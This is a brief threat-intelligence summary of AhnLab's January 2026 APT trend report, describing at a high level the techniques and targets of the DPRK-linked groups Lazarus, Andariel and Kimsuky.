AhnLab’s January 2026 APT trend report highlights several DPRK-linked activities affecting developer, Web3, public-sector, activist, and supply-chain targets. Lazarus is reported to have replaced blocked Pastebin infrastructure with Polygon NFT contracts as a dead-drop mechanism, combining VS Code folderOpen execution with npm script hijacking to run malicious code in developer environments. The Lazarus activity included modular stealers aimed at wallets, password managers, SSH keys, API credentials, and cryptocurrency assets. Andariel is described using TigerRAT, StarshellRAT, JelusRAT, GopherRAT, web shells, credential-dumping tools, BYOVD, scheduled tasks, and ERP update-chain abuse against European public/legal organizations and Korean ERP software customers. Kimsuky activity targeted a South Korean North Korea-related activist through MEGA-hosted spear phishing, LNK and PowerShell execution, Dropbox-based C2, AnyDesk concealment, scheduled tasks, and system-information theft.